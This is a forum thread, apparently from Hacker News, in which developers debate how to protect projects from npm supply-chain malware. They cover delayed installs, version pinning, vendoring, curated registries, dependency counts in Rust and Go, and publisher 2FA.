You can switch to the mentioned "delayed" mode if you're using pnpm. A few days ago, pnpm 10.16 introduced a minimumReleaseAge setting that delays the installation of newly released dependencies by a configurable amount of time.
> sort of a "delayed" mode
That's the secret lots of enterprises have relied on for ages. Don't be bleeding edge; let the rest of the world guinea-pig the updates and listen for them to sound the alarm if something's wrong. Obviously you do still need to pay attention to the occasional major, hot security issue and deal with it in a swift fashion.
Another good practice is to control when your updates occur - time them when it's ok to break things and your team has the bandwidth to fix things.
This is why I laughed hard when Microsoft moved to aggressively push Windows updates and the inevitable borking it did to people's computers at the worst possible times ("What's that you said? You've got a multi-million dollar deliverable pitch tomorrow and your computer won't start due to a broken graphics driver update?"). At least now there's a "delay" option similar to what you described, but it still riles me that update descriptions are opaque (so you can't selectively manage risk) and you don't really have the degree of control you ought to.
pnpm just added minimum age for dependencies https://pnpm.io/blog/releases/10.16#new-setting-for-delayed-...
From your link:
> In most cases, such attacks are discovered quickly and the malicious versions are removed from the registry within an hour.
By delaying the infected package's availability (by "aging" dependencies), we're only pushing back the time until it's detected, and reducing the number of samples that would surface it. Infections that lie dormant are even more dangerous than explosive ones.
The only benefit would be if, during this freeze, repository maintainers were successfully pruning malware before it hits the fan, and the freeze would give scanners more time to finish their verification pipelines. That's not happening afaik, NPM is crazy fast going from `npm publish` to worldwide availability, scanning is insufficient by many standards.
Afaict many of these recent supply chain attacks _have_ been detected by scanners. Which ones flew under the radar for an extended period of time?
From what I can tell, even a few hours of delay for actually pulling dependencies post-publication to give security tools a chance to find it would have stopped all (?) recent attacks in their tracks.
Thank god, adopting this immediately. Next I’d like to see Go-style minimum version selection instead.
Oh brilliant. I've been meaning to start migrating my use to pnpm; this is the push I needed.
When using Go, you don't get updated indirect dependencies until you update a direct dependency. It seems like a good system, though it depends on your direct dependencies not updating too quickly.
The auto-updating behaviour of dependencies because of the `^` version prefix is the root problem.
It's best to never use `^` and always specify an exact version, but many maintainers apparently can't be bothered to update their dependencies themselves, so it became the default.
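For readers less familiar with npm's range syntax, the difference is easy to demonstrate with the semver package (the same range logic npm itself uses); this is just an illustration of what a caret range accepts:

    import * as semver from "semver";

    // "^4.17.21" matches any later 4.x release, including one an attacker publishes
    // tomorrow, which gets picked up on the next lockfile update or fresh install.
    console.log(semver.satisfies("4.18.0", "^4.17.21")); // true
    console.log(semver.satisfies("5.0.0", "^4.17.21"));  // false (major bumps excluded)

    // An exact pin only ever matches the version you actually reviewed.
    console.log(semver.satisfies("4.18.0", "4.17.21"));  // false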
Maybe one approach would be to pin all dependencies, and not use any new version of a package until it reaches a certain age. That would hopefully be enough time for any issues to be discovered?
People living on the latest packages with their dependabots never made any sense to me, ADR. They trusted their system too much
If you don't review the pinned versions, it makes no difference.
Packages can still be updated, even if pinned. If a dependency of a dependency is not pinned - it can still be updated.
Use less dependencies :)
And larger dependencies that can be trusted in larger blocks. I'll bet half of a given projects dependencies are there to "gain experience with" or be able to name drop that you've used them.
Less is More.
We used to believe that. And then W3C happened.
Stick to (pin) old stable versions, don't upgrade often. Pain in the butt to deal with eventual minimum-version-dependency limitations, but you don't get the brand new releases with bugs. Once a year, get all the newest versions and figure out all the weird backwards-incompatible bugs they've introduced. Do it over the holiday season when nobody's getting anything done anyway.
If your employer paid your dependencies' verified authors to provide them licensed and signed software, you wouldn't have to rely on a free third party intermediary with a history of distributing massive amounts of malware for your security.
> One thing I was thinking of was sort of a "delayed" mode to updating my own dependencies.
You can do it:
https://github.blog/changelog/2025-07-01-dependabot-supports...
https://docs.renovatebot.com/configuration-options/#minimumr...
https://www.stepsecurity.io/blog/introducing-the-npm-package...
> As a user of npm-hosted packages in my own projects, I'm not really sure what to do to protect myself. It's not feasible for me to audit every single one of my dependencies, and every one of my dependencies' dependencies, and so on. Even if I had the time to do that, I'm not a typescript/javascript expert, and I'm certain there are a lot of obfuscated things that an attacker could do that I wouldn't realize was embedded malware.
I think Github's Dependabot can help you here. You can also host your own little instance of DependencyTrack and keep up to date with vulnerabilities.
> One thing I was thinking of was sort of a "delayed" mode to updating my own dependencies.
You can do this with npm (since version 6.9.0).
To only get registry deps that are over a week old:
$ npm install --before="$(date -v -7d)"
Source: Darcy Clarke - https://bsky.app/profile/darcyclarke.me/post/3lyxir2yu6k2s
I like to pin specific versions in my package.json so dependencies don't change without manual steps, and use "npm ci" to install exactly the versions in package-lock.json. My CI runs "npm audit", which will raise the alarm if a vulnerability emerges in those packages. With everything essentially frozen, either there is malware within it or there is not going to be, and the age of the packages softly implies there is not.
> instead of updating to the absolute latest version available of everything, it updates to versions that were released no more than some configurable amount of time ago
The problem with this approach is you need a certain number of guinea pigs on the bleeding edge or the outcome is the same (just delayed). There is no way for anyone involved to ensure that balance is maintained. Reducing your surface area is a much more effective strategy.
Not necessarily, some supply chain compromises are detected within a day by the maintainers themselves, for example by their account being taken over. It would be good to mitigate those at least.
In that specific scenario, sure; but I don't think that's a meaningful guardrail for a business.
I think it definitely couldn’t hurt. You’re right it doesn’t eliminate the threat of supply chain attacks, but it would certainly reduce them and wouldn’t require much effort to implement (either manually or via script). You’re basically giving maintainers and researchers time to identify new malware and patch or unrelease them before you’re exposed. Just make sure you still take security patches.
Rather than the user doing that "delay" installation, it would be a good idea if the package repository (i.e. NPM) actually enforced something like that.
For example, whenever a new version of a package is released, it's published to the repository but not allowed to be installed for at least 48 hours, and this gives time to any third-party observers to detect a malware early.
I recently started using npm for an application where there’s no decent alternative ecosystem.
The signal desktop app is an electron app. Presumably it has the same problem.
Does anyone know of any reasonable approaches to using npm securely?
“Reduce your transitive dependencies” is not a reasonable suggestion. It’s similar to “rewrite all the Linux kernel modules you need from scratch” or “go write a web browser”.
Most big tech companies maintain their own NPM registry that only includes approved packages. If you need a new package available in that registry you have to request it. A security team will then review that package and its deps and add it to the list of approved packages…
I would love to have something like that "in the open"…
A Debian version of NPM? I've seen a lot of hate on Reddit and other places about Debian because the team focuses on stability. When you look at the project in question, it's almost always based on Rust or Python.
> “Reduce your transitive dependencies” is not a reasonable suggestion. It’s similar to “rewrite all the Linux kernel modules you need from scratch” or “go write a web browser”.
Oh please, do not compare writing a bunch of utilities for your "app" with writing a web browser.
This is where distributed code audits come in, you audit what you can, others audit what they can, and the overlaps of many audits gives you some level of confidence in the audited code.
> I'm not really sure what to do
You need an EDR and a code repo scanner. Treating this purely as a technical problem of the infrastructure will accomplish little. The people that created these systems are long gone and had/have huge gaps in the capabilities needed to stop creating these problems.
npm shrinkwrap and then check in your node_modules folder. Don't have each developer (or worse, user) individually run npm install.
It's common among grizzled software engineering veterans to say "Check in the source code to all of your dependencies, and treat it as if it were your own source code." When you do that, version upgrades are actual projects. There's a full audit trail of who did what. Every build is reproducible. You have full visibility into all code that goes into your binary, and you can run any security or code maintenance tools on all of it. You control when upgrades happen, so you don't have a critical dependency break your upcoming project.
You can use Sonatype or Artifactory as a self-hosted provider for your NPM packages that keeps its own NPM repository. This way you can delay and control updates. It is common enterprise practice.
I update my deps once a year or when I specifically need to. That helps a bit. Though it upsets the security theatre peeps at work who just blindly think dependabot issues means I need to change dependencies.
I never understood the "let's always pin everything to the latest version and let's update the pinned versions every day"… what is even the point of this exercise? Might as well not pin at all.
Don't update your dependencies manually. Setup renovate to do it for you, with a delay of at least a couple of weeks, and enable vulnerability alerts so that it opens PRs for publicly known vulnerabilities without delay
https://docs.renovatebot.com/configuration-options/#minimumr...
https://docs.renovatebot.com/presets-default/#enablevulnerab...
Why was this comment downvoted? Please explain why you disagree.
I didn’t downvote, but...
Depending on a commercial service is out of the question for most open source projects.
Renovate is not commercial; it's an open-source dependabot, and quite a bit more capable at that.
AGPL is a no-go for many companies (even when it's just a tool that touches your code and not a dependency you link to).
good. that's the point.
agpl is a no go for companies not intending to ever contribute anything back. good riddance.
Not you. But one would expect major cybersecurity vendors such as Crowdstrike to screen their dependencies, yet they are all over the affected list.
It looks like they actually got infected as well. So it's not only that, their security practices seem crap
>It's not feasible for me to audit every single one of my dependencies
Perhaps I’m just ignorant of web development, but why not? We do so with our desktop software.
An average complex .NET Core desktop app may have a dozen dependencies, if it even gets to that point. An average npm todo list may have several thousand, if not more.
Lots of software has update policies like this, and people will also run a separate test environment that updates to the latest.
Sure, and I do that whenever I can. But I'm not going to write my own react, or even my own react-hook-form. I'm not going to rewrite stripe-js. Looking through my 16 direct dependencies -- that pull in a total of 653 packages, jesus christ -- there's only one of them that I'd consider writing myself (js-cookie) in order to reduce my dependency count. The rest would be a maintenance burden that I shouldn't have to take on.
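For what it's worth, the js-cookie case really is the approachable one: a project-specific helper covering the get/set/remove subset most apps use is only a handful of lines. A browser-only sketch, ignoring advanced attributes like SameSite or domain:

    // Minimal cookie helper, roughly the subset of js-cookie many apps actually use.
    export function setCookie(name: string, value: string, days = 365): void {
      const expires = new Date(Date.now() + days * 864e5).toUTCString(); // 864e5 ms per day
      document.cookie = `${encodeURIComponent(name)}=${encodeURIComponent(value)}; expires=${expires}; path=/`;
    }

    export function getCookie(name: string): string | undefined {
      const prefix = `${encodeURIComponent(name)}=`;
      const hit = document.cookie.split("; ").find((part) => part.startsWith(prefix));
      return hit ? decodeURIComponent(hit.slice(prefix.length)) : undefined;
    }

    export function removeCookie(name: string): void {
      setCookie(name, "", -1); // an expiry in the past deletes the cookie
    }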
There's this defense mechanism, I don't know what it's called, where someone takes a criticism to the extreme in order to complain about it being unfeasible.
Criticism: "You should shower every day"
Defense: "OH, maybe I should shower every hour, to the point where my skin dries and I can't get my work done because I'm in the shower all day."
No, there's a pretty standard way of doing things that you can care to learn, and it's very feasible, people shower every day during the week, sometimes they skip if they don't go out during weekends, if it's very cold you can skip a day, and if it's hot you can even shower twice. You don't even need to wash your hair every day. There's nuance that you can learn if you stop being so defeatist about it.
Similarly, you can of course install stripe-js since it's vendored from a paid provider with no incentive to fuck you with malware and with resources to audit dependency code, at any rate they are already a dependency of yours, so adding an npm package does not add a vendor to your risk profile.
Similarly you can add react-hook-form if it's an official react package, however if it isn't, then it's a risk, investigate who uploads it, if it's a random from github with an anime girl or furry image in their profile, maybe not. Especially if the package is something like an unofficial react-mcp-dotenv thing where it has access to critical secrets.
Another fallacy is that you have to rewrite the whole dependency you would otherwise import. False. You are not going to write a generic solution for all use cases, just for your own, and it will be tightly integrated and of higher quality and less space (which helps with bandwidth, memory and CPU caching), because of it. For god's sake, you used an example relating to forms? We've had forms since the dot com boom, how come you are still having trouble with those? You should know them like the back of your hand.
Reductio ad Absurdum may be what you're thinking of, but Straw Man might also apply. Funny enough the responder didn't actually do what you said. They stated of the 600+ dependencies they counted there was only one they felt comfortable implementing themselves. Your accusation of them taking your statement to the extreme is reverse straw man rhetoric; you're misrepresenting their argument as extreme or absurd when it’s actually not.
Reductio ad Absurdum is not a fallacy but a legitimate rhetorical technique where you can point out obvious flaws in logic by taking that logic and applying it to something that people would find ridiculous. Note that this is not the most 'extreme' version, it is the same version, using the same logic.
Example:
Argument: People should be able to build whatever they want on their own property.
Reductio ad Absurdum position: I propose to build the world's largest Jenga tower next to your house.
Note that this does not take into account any counter arguments such as 'if it falls on me you will still be liable for negligence', but it makes a point without violating the logic of the original argument. To violate that logic would indeed be a straw man.
Just wanted to comment that chatgpt also wrongly categorizes this as reductio ad absurdum and strawman.
This is very dead internet theory, but not automated, someone copied my comment, gave it to chatgpt, and returned the chatgpt answer, presumably passing it off as their own, but in effect we are talking with chatgpt lol.
It wouldn't be that annoying if it weren't wrong, I guess.
React has zero dependencies and Stripe has one... What else do you need?
I guess this is a joke, but imo it shouldn't be.
Not entirely a joke actually. For example, I have worked at a large corp where dependencies were highly discouraged. For example, lodash was not used in the codebase I was working on, and if you really needed something from lodash you were encouraged to copy-paste the function. This won't work for large libraries of course, but the copy-paste-first mentality is not a bad one.
I'm all for disregarding DRY and copypasting code you wrote.
But I think for untrusted third party code, it's much better to copy the code by hand; that way you are really forced to audit it. There really isn't much of an advantage to copying an install.sh script compared to just downloading and running the .sh, whereas writing the actual .sh commands on the command line (and following any other URLs before executing them) is golden.
Wonder how long until LLMs spew the malware in those packages along with the code when you request the same functionality.
would you pay a subscription for a vetted repo?
If you pull something into your project, you're responsible for it working. Full stop. There are a lot of ways to manage/control dependencies. Pick something that works best for you, but be aware, due diligence, like maintenance is ultimately your responsibility.
Oh I'm well aware, and that's the problem. Unfortunately none of the available options hit anything close to the sweet spot that makes me comfortable.
I don't think this is a particularly unreasonable take; I'm a relative novice to the JS ecosystem, and I don't feel this uncomfortable taking on dependencies as I do in pretty much any other ecosystem I participate in, even those (like Rust) where the dependency counts can be high.
Acknowledging your responsibility doesn't make the problem go away. It's still better to have extra layers of protection.
I acknowledge that it is my responsibility to drive safely, and I take that responsibility seriously. But I still wear a seat belt and carry auto insurance.
Almost all software has a no warranty clause. I am not a lawyer but in pretty plain English every piece of software I have ever used has said exactly that I can fuck off if I expect it to work or do anything.
To clarify - I don't think it is naive to assume the software is as-is with all responsibilities on the user, since that is exactly what lawyers have made all software companies say for over 50 years.
Product liability is coming for software. Warranty disclaimers in licenses will be rendered ineffective by the end of 2026 at the latest.
this seems highly unlikely. Almost all of the software we're discussing in this context has little or no resources behind it. No lawyers are going to sue an OSS developer because there's no payday.
Source? An open source library is not necessarily a ‘product’ at all.
No source because it's not real. There's talk about final products and making the companies selling them responsible. But open source developers are not responsible.
only if you pay for it… otherwise you are liable but don't have anyone else to blame.
I'm not sure what your point is. I was saying it's naive to think that everyone is going to review all dependencies, and we can do better than requiring them to.
I thought my point was clearly made the 1st time.
How can we promise to "do better" when shit like "no author or distributor accepts responsibility to anyone for the consequences of using it or for whether it serves any particular purpose or works at all" is in the legal agreement of the software you are using?
Making someone agree to that while simultaneously on the side making promises that the software works is used car salesman gimmicks. The only things that matters is what you put in writing.
> How can we promise to "do better" when shit like "no author or distributor accepts responsibility to anyone
One way or another that will end.
Free Software will have the same responsibilities. If you write software, negligently, and it causes damage, you will be liable
I should not be able to make a Crypto wallet that is easy to hack and distribute it without consequence
This will be a very good thing
We know how to make secure, reliable software (some of us), but nobody will pay for it
This happens because there's no auditing of new packages or versions. The distro's maintainer and the developer are the same person.
The general solution is to do what Debian does.
Keep a stable distro where new packages aren't added and versions change rarely (security updates and bugfixes only, no new functionality). This is what most people use.
Keep a testing/unstable distro where new packages and new versions can be added, but even then added only by the distro maintainer, NOT by the package developers. This is where the audits happen.
NPM, Python, Rust, Go, Ruby all suffer from this problem, because they have centralized and open package repositories.
This is a culture issue with developers who find it OK to have hundreds of (transitive) dependencies, and then follow processes that, for all intents and purposes, blindly auto-update them, thereby giving hundreds of third parties access to their build (or, worse, execution) environments.
Adding friction to the sharing of code doesn't absolve developers from their decision to blindly trust a ridiculous amount of third-parties.
I find that the issue is much more often not updating dependencies often enough with known security holes, than updating too often and getting hit with a supply-chain malware attack.
There have been several recent supply chain attacks that show attackers are taking advantage of this (previously sensible) mentality. So it is time to pivot and come up with better solutions before it spirals out of control.
A model that Linux distros follow would work to an extent: you have developers of packages and separate maintainers who test and decide to include or exclude packages and versions of packages. Imagine a JS distro which includes the top 2000 most popular libraries that are all known to work with each other. Your project can pull in any of these, and every package is cryptographically signed off on by both the developers and the maintainer.
Vulnerabilities in Linux distro packages obviously happen. But a single developer cannot push code directly into for example Debian and compromise the world.
Not updating is the other side of the same problem: library owners feel it is ok to make frequent backwards-compatibility breaking changes, often ignoring semver conventions. So consumers of their libraries are left with the choice to pin old insecure versions or spend time rewriting their code (and often transitive dependency code too) to keep up.
This is what happens when nobody pays for anything and nobody feels they have a duty to do good work for free.
>This is what happens when nobody pays for anything and nobody feels they have a duty to do good work for free.
Weirdly, some of the worst CVEs I can think of were in enterprise software.
That's because there, many people don't feel like it is their duty to do good work, even though they are paid ...
Who do you mean with "many people"? Developers who do not care or middle management that oversold features and overcommitted w.r.t. deadlines? Or both? Someone else?
I was thinking of many developers, but actually middle management should be included.
And the CEO. And lawmakers
It's not unreasonable to trust large numbers of trustworthy dependency authors. What we lack are the institutions to establish trust reliably.
If packages had to be cryptographically signed by multiple verified authors from a per-organization whitelist in order to enter distribution, that would cut down on the SPOF issue where compromising a single dev is enough to publish multiple malware-infested packages.
"Find large numbers of trustworthy dependency authors in your neighborhood!"
"Large numbers of trustworthy dependency authors in your town can't wait to show you their hottest code paths! Click here for educational livecoding sessions!"
I don't understand your critique.
Establishing a false identity well enough to fool a FOSS author or organization is a lot of work. Even crafting a spear phishing email/text campaign doesn't compare to the effort you'd have to put in to fool a developer well enough to get offered publishing privileges.
Of course it's possible, but so are beat-them-with-a-five-dollar-wrench attacks.
It IS unreasonable to trust individual humans across the globe in 100+ different jurisdictions pushing code that gets bundled into my application.
How can you guarantee a long trusted developer doesn't have a gun pointed to their head by their authoritarian govt?
In our B2B shop we recently implemented a process where developers cannot add packages from third party sources - only first party like meta, google, spring, etc are allowed. All other boilerplate must be written by developers, and on the rare occasion that a third party dependency is needed it's copied in source form, audited and re-hosted on our internal infrastructure with an internal name.
To justify it to business folks, we presented some simple math where I added the man-hours required to plug vulnerabilities to the recurring cost of devsecops consultants, and found that it's cheaper to reduce development velocity by 20-25%.
Also devsecops should never be offshored due to the scenario I presented in my second statement.
You've presented your argument as if rebutting mine, but to my mind you've reinforced my first paragraph:
* You are trusting large numbers of trustworthy developers.
* You have established a means of validating their trustworthiness: only trust reputable "first-party" code.
I think what you're doing is a pretty good system. However, there are ways to include work by devs who lack "first-party" bona-fides, such as when they participate in group development where their contributions are consistently audited. Do you exclude packages published by the ASF because some contributions may originate from troublesome jurisdictions?
In any case, it is not necessary to solve the traitorous author problem to address the attack vector right in front of us, which is compromised authors.
If someone is wondering how effective such an approach is going to be with npm, consider the following:
If you add jest, the popular test runner by Meta, that's adding 300 packages to your dependency graph.
And here we don't yet have a bundler, linter, code formatter, or even web framework.
So good luck with minimizing those dependencies.
Problem is that beyond some threshold number of authors, the probability they're all trustworthy falls to zero.
It's true that smuggling multiple identities into the whitelist is one attack vector, and one reason why I said "cut down" rather than "eliminate". But that's not easy to do for most organizations.
For what it's worth, back when I was active at the ASF we used to vote on releases — you needed at least 3 positive votes from a whitelist of approved voters to publish a release outside the org and there was a cultural expectation of review. (Dunno if things have changed.) It would have been very difficult to duplicate this NPM attack against the upstream ASF release distribution system.
> This is a culture issue with developers who find it OK to have hundreds of (transitive) dependencies, and then follow processes that, for all intents and purposes, blindly auto update them
I do not know about NPM. But in Rust this is common practice.
Very hard to avoid. The core of Rust is very thin; getting anything done typically involves dozens of crates, all pulled in at compile time from any old developer who is implicitly trusted.
You can write entire applications in Go without resorting to any dependencies, the std lib is quite complete.
Most projects will have a healthy 5-20 dependencies though, with very few nested modules.
See auto update bots on Github. https://docs.github.com/en/code-security/dependabot/dependab... And since Github does it, it must be a good thing, right? Right???
>absolve developers
Doesn't this ultimately go all the way up to the top?
You have 2 devs: one who mostly writes their own code, only uses packages that are audited etc; the other uses packages willy nilly. Who do you think will be hired? Who do you think will be able to match the pace of development that management and executives demand?
Unfortunately that's almost the whole industry. Every software project I've seen has an uncountable amount of dependencies. No matter if npm, cargo, go packages, whatever you name.
Every place I ever worked at made sure to curate the dependencies for their main projects. Heck, in some cases that was even necessary for certifications. Web dev might be a wild west, but as soon as your software is installed on prem by hundreds or thousands of paying customers the stakes change.
Curating dependencies won't prevent all supply chain attacks though
Zero-external-dependency Go apps are far more feasible than Rust or Node, simply because of the size and quality of the standard library.
Just the other day someone argued with me that it was reasonable for Limbo (the SQLite Rust rewrite) to have 3135 dependencies (of those, 1313 Rust dependencies).
Even more wild considering that SQLite prides itself on having zero dependencies. Sounds like a doomed project.
This is incredible.
At this rate, there's a non-zero chance that one of the transitive dependencies is SQLite itself.
3 different types of sqlite, 14 different versions total: https://github.com/tursodatabase/turso/network/dependencies?...
Looks like they're all pulled in as dev dependencies. libsqlite3-sys gets pulled in by rusqlite, which is used by core_tester, limbo_sim, write-throughput-sqlite, and as a dev_dependency for turso_core.
But it will be safe SQlite, called from Rust.
Yeah. You have dev dependencies in there; those alone will increase the number of dependencies by ~500 without ending up in the final product.
Those numbers are way off their actual number.
Right. Allowing 500 strangers to push code to our CI infra, or developer laptops, with approximately zero review, sounds similarly ill advised.
That JLR got their factories hacked, rather than customer cars, is less bad for sure. But it's still pretty bad.
Also, before arguing that code generators should get a pass as they don't “end up in the final product”, you really should read “Reflections on trusting trust” by Ken Thompson.
> Right. Allowing 500 strangers to push code to our CI infra
That's bullshit, pure and simple. If you pull in a deeply nested dependency like icu_normalizer it has 30 dependencies, OMGHAXOZRS. I'm doing this, so I don't have to spend a day going through the library.
Except that of the 30 dependency crates, 10 are from the ICU4X repository, and then you have almost-standard dependencies like the proc-macro/syn/quote crates from dtolnay, `zerofrom` from Google, `smallvec` from the Servo project, and `yoke` from... checks notes... ICU4X.
The only remaining crates are `write16`, `utf8_iter` and `utf16_iter`, which are written by hsivonen, who is also an ICU4X contributor.
So even for 30 dependencies, you actually depend on proc-macro/syn/quote, which are foundational crates, a few crates from Google, a few from Servo, and three crates written by another ICU4X contributor.
We started with 30 dependencies and ended up with 3 strangers.
It's great that you did that due diligence once. It really is. If I were reviewing that merge request, and you told me that, I'd be inclined to approve.
But how do we scale that to 1000 dependencies, and every one of their updates? What tools are there to help us, and does the community at large use them?
What I really don't like, and why I wrote that it's a culture issue, is the lightness with which these decisions are often made.
My most popular library has about a dozen dependencies. The README states clearly and “above the fold” what are the core deps (3, no transitive). Every other dependency is either first party, or optional and justified with a comment in the deps file (if you don't use the optional feature, it doesn't end up in your deps file).
There's also a generated BLOB. The generation of the BLOB is reproducible in your own environment, and its provenance attestated.
Those are all risks, that I'm passing on to my users, but I do my best to mitigate them, and communicate this clearly to them.
> But how do we scale that to 1000 dependencies, and every one of their updates? What tools are there to help us, and does the community at large use them?
Use
cargo install cargo-supply-chain
cargo supply-chain --publishers
Run it for whatever you want to check, then have lunch; it takes 10-30 min. It will list exactly how many organizations, and even individuals, have publish rights. For turso there are 51 repositories and 243 different individuals with publish rights.
Of course, this still doesn't group by github org and so on.
Sorry, I don't know much about the subject, so this is not a rhetorical or even just loaded question:
Isn't it actually the case that you started with 30 strangers, but 27 of them were relatively easy (if still time-consuming) to figure out as safe?
You have 30 items you bought from various stores. You bought ~20 from yourself, around 5 from Google, 4 from hsivonen and one from servo.
You could of course investigate individuals commits, but that's probably an overkill.
Even 50 seems unreasonable...
Rather than adding friction there is something else that could benefit from having as little friction as sharing code: publishing audits/reviews.
Be that as it may, a system that can fail catastrophically will. Security shouldn't be left to choice.
There is another related growing problem in my recent observation. As a Debian Developer, when I try to audit upstream changes before pulling them in to Debian, I find a huge amount of noise from tooling, mostly pointless. This makes it very difficult to validate the actual changes being made.
For example, an upstream bumps a version of a lint tool and/or changes style across the board. Often these are labelled "chore". While I agree it's nice to have consistent style, in some projects it seems to be the majority of the changes between releases. Due to the difficulty in auditing this, I consider this part of the software supply chain problem and something to be discouraged. Unless there's actually reason to change code (eg. some genuine refactoring a human thinks is actually needed, a bug fix or new feature, a tool exposed a real bug, or at least some identifiable issue that might turn into a bug), it should be left alone.
I agree with this and it's something I've encountered when just trying to understand a codebase or track down a bug. There's a bit of the tail wagging the dog as an increasing proportion of commits are "meta-code" that is just tweaking config, formatting, etc. to align with external tools (like linters).
> Unless there's actually reason to change code (eg. some genuine refactoring a human thinks is actually needed, a bug fix or new feature, a tool exposed a real bug, or at least some identifiable issue that might turn into a bug), it should be left alone.
The corollary to this is "Unless there's actually a need for new features that a new version provides, your existing dependency should be left alone". In other words things should not be automatically updated. This is unfortunately the crazy path we've gone down, where when Package X decides to upgrade, everyone believes that "the right thing to do" is for all its dependencies to also update to use that and so on down the line. As this snowballs it becomes difficult for any individual projects to hold the line and try to maintain a slow-moving, stable version of anything.
I'm using difftastic; it cuts down a whole lot of the noise.
This looks good! Unfortunately it looks like it also suffers from exactly the same software supply chain problem that we need to avoid in the first place: https://github.com/Wilfred/difftastic/blob/master/Cargo.lock
Edit: also, consider how much of https://github.com/Wilfred/difftastic/commits/master/ is just noise in itself. 15k commits for a project that appears to only be about four years old.
"exactly the same software supply chain problem"
While the crates ecosystem is certainly not immune to supply chain attacks this over generalization is not justified.
There are several features that make crates.io more robust than npm. One of them is that vulnerable versions can be yanked without human intervention. Desperate comments from maintainers like this one[1] from just a few days ago would not happen with crates.io.
There are also features not provided by crates.io that make the situation better. For example you could very easily clone the repo and run
cargo vet
to check how many of the packages had human audits. I'd have done it if I were at a computer, but a quick glance at the Cargo.lock file makes me confident that you'd get a significant number.
The main issue there is that the maintainer lost access to their account. Yanking malicious packages is better, but even just being able to release new patch versions would've stopped the spread, and they were not able to do so for the packages that didn't have a co-publisher. How would crates.io help in this situation?
FWIW npm used to allow unpublishing packages, but AFAIK that feature was removed in the wake of the left-pad incident [1]. Although now, with all the frequent attacks, it might be worth considering whether ecosystem disruption via malicious removal of a package would be the lesser of two evils compared to actual malware being distributed.
I'd argue it's more of a culture thing, not technical thing.
In both JavaScript and Rust, it's normal and even encouraged to just add a tiny dependency through the package manager. The communities even pride themselves on having package managers good enough to make this easy.
It's this "yeah, there is a crate for this tiny function I need, let's just include it" mentality that makes the ecosystem vulnerable.
People need to be responsible for whatever they include: either pay the price by checking all versions up front, or pay it by risking shipping a vulnerable program that is much harder to retract than a JavaScript frontend.
In Rust we have cargo vet, where we share these audits and use them in an automated fashion. Companies like Google and Mozilla contribute their audits.
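For anyone who hasn't tried it, a rough sketch of that workflow (everything here is standard cargo-vet usage as far as I know; adjust to taste):

    cargo install cargo-vet    # one-time install of the subcommand
    cargo vet init             # creates supply-chain/config.toml and audits.toml in your repo
    cargo vet                  # checks every dependency against recorded and imported audits
    cargo vet suggest          # lists the unaudited crates it recommends reviewing

Third-party audits, like the ones Google and Mozilla publish, get pulled in through the imports section of supply-chain/config.toml, so you only have to personally review what nobody you trust has reviewed yet.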
I wish cargo went with crev instead, which has a much better model for distributed code audits.
Nuget, Powershell gallery, the marketplaces for VSCode/VS/AZDo and the Microsoft Store too. Probably another twenty.
They collect package managers like funko pops.
I'm not quite sure about the goal. Maybe some more C# dev kit style rug-pulls where the ecosystem is nominally open-source but MS own the development and distribution so nobody would bother to compete.
I took those acquisitions and a few others like LinkedIn and all the visual studio versions as a sign that Microsoft is trying to own the software engineer career as a domain.
And it's a great idea, similar thematically to certificate transparency
How to backport security fixes to vetted packages?
I'd like to think there are ways to do this and keep things decentralized.
Things like: Once a package has more than [threshold] daily downloads for an extended period of time, it requires 2FA re-auth/step-up on two separate human-controlled accounts to approve any further code updates.
Or something like: for these popular packages, only a select list of automated build systems with reproducible builds can push directly to NPM, which would mean that any malware injector would need to first compromise the source code repository. Which, to be fair, wouldn't necessarily have stopped this worm from propagating entirely, but would have slowed its progress considerably.
This isn't a "sacrifice all of NPM's DX and decentralization" question. This is "a marginally more manual DX only when you're at a scale where you should be release-managing anyways."
> two separate human-controlled accounts to approve any further code updates.
Except most projects have 1 developer… Plus, if I develop some project for free I don't want to be wasting time and work for free for large rich companies. They can pay up for code reviews and similar things instead of adding burden to developers!
I think that we should impose webauthn 2fa on all npm accounts as the only acceptable auth method if you have e.g., more than 1 million total downloads.
Someone could pony up the cash to send out a few thousand yubikeys for this and we'd all be a lot safer.
Why even put a package download count on it? Just require it for everything submitted to NPM. It's not hard.
Because then it's extra hassle and expense for new developers to publish a package, and we're trying to keep things decentralized.
It's already centralized by virtue of using and relying on NPM as the registry.
If we want decentralized package management for node/javascript, you need to dump NPM - why not something like Go's system which is actually decentralized? There is no package repository/registry, it's all location based imports.
Decentralized? This is a centralized package registry. There is nothing decentralized about it.
oh right, good point, I wonder when somebody will just sue NPM for any damage caused. That's really the only way we'll see change I think.
Download counters are completely useless. I could download your package 2 million times in under a minute and cause you to need the 2FA.
And true 2FA means you can't automate publishing from github's CI. Python is going the other direction. There is a fake 2FA that is just used to generate tokens and there is a preferential channel to upload to pypi via github's CI.
But in my opinion none of this helps with security. But it does help to de-anonymise the developers, which is probably what they really want to do, without caring if those developers get hacked and someone else uses their identity to do uploads.
I don’t understand what benefits this kind of “decentralization” offers
Larger pool of people you can hack/blackmail/coerce into giving you access to millions of systems :)
Even the simplest "any maintainer can click a push notification on their phone to verify that they want to push an update to $package" would have stopped this worm in its tracks!
How would that work for CI release flows? I have my Rust crates, for example, set up to auto-publish whenever I push a tag to its repo.
PyPI already has this. It was a little bit annoying when they imposed stricter security on maintainers, but I can see the need.
PyPI did that; I got 2 Google keys for free. But I used them literally once, to create a token that never expires, and that is what I actually use to upload to PyPI.
(I did a talk at minidebconf last year in toulouse about this).
If implemented like this, it's completely useless, since there is actually no 2fa at all.
Anyway the idea of making libre software developers work more is a bad idea. We do it for fun. If we have to do corporate stuff we want a corporate salary to go with.
You can use debian's version of your npm packages if you'd like. The issues you're likely to run into are: some libraries won't be packaged period by debian; those that are might be on unacceptably old versions. You can work around these issues by vendoring dependencies that aren't in your distro's repo, ie copying a particular version into your own source control, manually keeping up with security updates. This is, to my knowledge, what large tech companies do. Other companies that don't are either taking a known risk with regards to vulnerabilities, or are ignorant. Ignorance is very common in this industry.
Distros are struggling with the amount of packages they have to maintain and update regularly. That's one of the main reasons why languages built their own ecosystems in the first place. It became popular with CPAN and Maven and took off with Ruby gems.
Linux distros can't even provide all the apps users want, that's why freshmeat existed and we have linuxbrew, flatpak, Ubuntu multiverse, PPA, third party Debian repositories, the openSUSE Buildservice, the AUR, ...
There is no community that has the capacity to audit and support multiple branches of libraries.
The lack of an easy method to automatically pull in and manage dependencies in C/C++ is starting to look a lot more like a feature than a bug now.
Author of Odin is also against adding a package manager: https://www.gingerbill.org/article/2025/09/08/package-manage...
But there's so much UB in C++ that can be exploited that I doubt attackers lament the lack of a module system to target. ;)
